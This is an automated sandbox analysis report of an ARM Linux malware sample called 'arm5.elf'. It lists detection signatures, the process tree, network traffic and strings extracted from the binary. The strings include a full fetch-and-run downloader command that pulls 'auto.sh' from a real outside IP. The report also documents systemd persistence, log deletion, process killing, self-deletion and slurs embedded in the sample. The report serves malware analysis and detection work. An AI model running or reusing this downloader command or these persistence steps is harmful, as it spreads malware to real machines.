Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm5.elf

Overview

General Information

Sample name:arm5.elf
Analysis ID:1583069
MD5:8114773b3827da1450fa61dda0679c8b
SHA1:db663b5e80ce27edbb3d06b81bca78b45cc5b1dc
SHA256:b6720048ed8dc114296bb3007adca57f649247dddadde777b00019aaadd1d360
Tags:elfuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Deletes system log files
Manipulation of devices in /dev
Sample deletes itself
Sends malformed DNS queries
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1583069
Start date and time:2025-01-01 18:41:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 37s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm5.elf
Detection:MAL
Classification:mal72.troj.evad.linELF@0/4@54/0

Warnings

  • VT rate limit hit for: tcpdown.suo. [malformed]
  • VT rate limit hit for: tcpdown.su|1

Runtime Messages

Command:/tmp/arm5.elf
PID:6251
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:

Process Tree

  • system is lnxubuntu20
  • dash New Fork (PID: 6223, Parent: 4331)
  • rm (PID: 6223, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.s3f1DOFraO /tmp/tmp.INBspAWO6B /tmp/tmp.AXSB26qnlD
  • dash New Fork (PID: 6224, Parent: 4331)
  • rm (PID: 6224, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.s3f1DOFraO /tmp/tmp.INBspAWO6B /tmp/tmp.AXSB26qnlD
  • arm5.elf (PID: 6251, Parent: 6151, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.elf
    • arm5.elf New Fork (PID: 6253, Parent: 6251)
      • arm5.elf New Fork (PID: 6255, Parent: 6253)
        • arm5.elf New Fork (PID: 6415, Parent: 6255)
        • arm5.elf New Fork (PID: 6417, Parent: 6255)
        • arm5.elf New Fork (PID: 6426, Parent: 6255)
        • arm5.elf New Fork (PID: 6434, Parent: 6255)
        • arm5.elf New Fork (PID: 6436, Parent: 6255)
        • arm5.elf New Fork (PID: 6443, Parent: 6255)
        • arm5.elf New Fork (PID: 6452, Parent: 6255)
        • arm5.elf New Fork (PID: 6454, Parent: 6255)
        • arm5.elf New Fork (PID: 6463, Parent: 6255)
        • arm5.elf New Fork (PID: 6465, Parent: 6255)
        • arm5.elf New Fork (PID: 6494, Parent: 6255)
        • arm5.elf New Fork (PID: 6497, Parent: 6255)
        • arm5.elf New Fork (PID: 6503, Parent: 6255)
        • arm5.elf New Fork (PID: 6512, Parent: 6255)
        • arm5.elf New Fork (PID: 6514, Parent: 6255)
        • arm5.elf New Fork (PID: 6523, Parent: 6255)
        • arm5.elf New Fork (PID: 6525, Parent: 6255)
        • arm5.elf New Fork (PID: 6555, Parent: 6255)
        • arm5.elf New Fork (PID: 6558, Parent: 6255)
        • arm5.elf New Fork (PID: 6571, Parent: 6255)
        • arm5.elf New Fork (PID: 6577, Parent: 6255)
        • arm5.elf New Fork (PID: 6586, Parent: 6255)
        • arm5.elf New Fork (PID: 6589, Parent: 6255)
        • arm5.elf New Fork (PID: 6596, Parent: 6255)
        • arm5.elf New Fork (PID: 6602, Parent: 6255)
        • arm5.elf New Fork (PID: 6605, Parent: 6255)
        • arm5.elf New Fork (PID: 6607, Parent: 6255)
        • arm5.elf New Fork (PID: 6616, Parent: 6255)
        • arm5.elf New Fork (PID: 6618, Parent: 6255)
        • arm5.elf New Fork (PID: 6622, Parent: 6255)
        • arm5.elf New Fork (PID: 6632, Parent: 6255)
        • arm5.elf New Fork (PID: 6637, Parent: 6255)
        • arm5.elf New Fork (PID: 6646, Parent: 6255)
        • arm5.elf New Fork (PID: 6651, Parent: 6255)
        • arm5.elf New Fork (PID: 6662, Parent: 6255)
        • arm5.elf New Fork (PID: 6664, Parent: 6255)
        • arm5.elf New Fork (PID: 6673, Parent: 6255)
        • arm5.elf New Fork (PID: 6679, Parent: 6255)
        • arm5.elf New Fork (PID: 6691, Parent: 6255)
        • arm5.elf New Fork (PID: 6693, Parent: 6255)
        • arm5.elf New Fork (PID: 6700, Parent: 6255)
        • arm5.elf New Fork (PID: 6703, Parent: 6255)
        • arm5.elf New Fork (PID: 6706, Parent: 6255)
        • arm5.elf New Fork (PID: 6716, Parent: 6255)
        • arm5.elf New Fork (PID: 6723, Parent: 6255)
      • arm5.elf New Fork (PID: 6257, Parent: 6253)
        • arm5.elf New Fork (PID: 6262, Parent: 6257)
      • arm5.elf New Fork (PID: 6260, Parent: 6253)
      • sh (PID: 6260, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
        • sh New Fork (PID: 6264, Parent: 6260)
        • systemctl (PID: 6264, Parent: 6260, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • arm5.elf New Fork (PID: 6269, Parent: 6253)
      • sh (PID: 6269, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"
        • sh New Fork (PID: 6271, Parent: 6269)
        • systemctl (PID: 6271, Parent: 6269, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service
  • systemd New Fork (PID: 6266, Parent: 6265)
  • snapd-env-generator (PID: 6266, Parent: 6265, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6273, Parent: 6272)
  • snapd-env-generator (PID: 6273, Parent: 6272, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6275, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 6275, Parent: 1477, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • systemd New Fork (PID: 6280, Parent: 1)
  • systemd-hostnamed (PID: 6280, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • gdm3 New Fork (PID: 6413, Parent: 1320)
  • Default (PID: 6413, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6414, Parent: 1320)
  • Default (PID: 6414, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup

Yara Signatures

No yara matches

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: arm5.elfAvira: detected
Multi AV Scanner detection for submitted file
Source: arm5.elfVirustotal: Detection: 50%Perma Link
Source: arm5.elfReversingLabs: Detection: 52%
Source: arm5.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: arm5.elfString: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/console/var/wwww/etc/systemd/system/startup_command.service[Unit]
Source: arm5.elfString: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: startup_command.service.17.drString: ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null)

Networking

barindex
Sends malformed DNS queries
Source: global trafficDNS traffic detected: malformed DNS query: tcpdown.suo. [malformed]
Source: global trafficTCP traffic: 192.168.2.23:38172 -> 45.200.149.249:2601
Source: global trafficTCP traffic: 192.168.2.23:57096 -> 107.175.130.16:7722
Source: /tmp/arm5.elf (PID: 6251)Socket: 127.0.0.1:39123Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su|1
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.suo. [malformed]
Source: startup_command.service.17.drString found in binary or memory: http://154.216.18.192/auto.sh
Source: arm5.elf, startup_command.service.17.drString found in binary or memory: http://154.216.18.192/auto.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sampleString containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/console/var/wwww/etc/systemd/system/startup_command.service[Unit]
Source: Initial sampleString containing 'busybox' found: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/arm5.elf (PID: 6257)SIGKILL sent: pid: 721, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 6257)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 6257)SIGKILL sent: pid: 912, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 6257)SIGKILL sent: pid: 918, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 6257)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 6257)SIGKILL sent: pid: 1601, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 6257)SIGKILL sent: pid: 1638, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 6257)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 6257)SIGKILL sent: pid: 6275, result: successfulJump to behavior
Source: classification engineClassification label: mal72.troj.evad.linELF@0/4@54/0

Data Obfuscation

barindex
Manipulation of devices in /dev
Source: /tmp/arm5.elf (PID: 6255)Deleted: /dev/kmsgJump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6275)Directory: <invalid fd (9)>/..Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6275)Directory: <invalid fd (8)>/..Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6280)Directory: <invalid fd (10)>/..Jump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6234/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6236/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/910/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6227/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6226/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6229/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6228/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6241/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6240/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6243/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6242/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6244/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1349/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1344/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1465/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1586/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/248/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/249/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1463/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6238/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/801/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6237/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/6239/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/1900/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/491/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/250/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/130/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/251/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/252/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/132/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/253/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/254/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6251)File opened: /proc/255/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 6260)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/arm5.elf (PID: 6269)Shell command executed: sh -c "systemctl enable startup_command.service"Jump to behavior
Source: /usr/bin/dash (PID: 6223)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.s3f1DOFraO /tmp/tmp.INBspAWO6B /tmp/tmp.AXSB26qnlDJump to behavior
Source: /usr/bin/dash (PID: 6224)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.s3f1DOFraO /tmp/tmp.INBspAWO6B /tmp/tmp.AXSB26qnlDJump to behavior
Source: /bin/sh (PID: 6264)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6271)Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.serviceJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Deletes system log files
Source: /tmp/arm5.elf (PID: 6255)Log files deleted: /var/log/kern.logJump to behavior
Sample deletes itself
Source: /tmp/arm5.elf (PID: 6251)File: /tmp/arm5.elfJump to behavior
Source: /tmp/arm5.elf (PID: 6251)Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6280)Queries kernel information via 'uname': Jump to behavior
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 6251.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6415.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6417.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6426.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6434.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6436.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6443.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6452.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6454.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6463.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6465.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6494.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6497.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6503.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6512.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6514.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6523.1.00007fff73111000.00007fff73132000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf
Source: arm5.elf, 6673.1.00007fba34034000.00007fba34045000.rw-.sdmpBinary or memory string: $/tmp/vmware-root_721-4290559889,
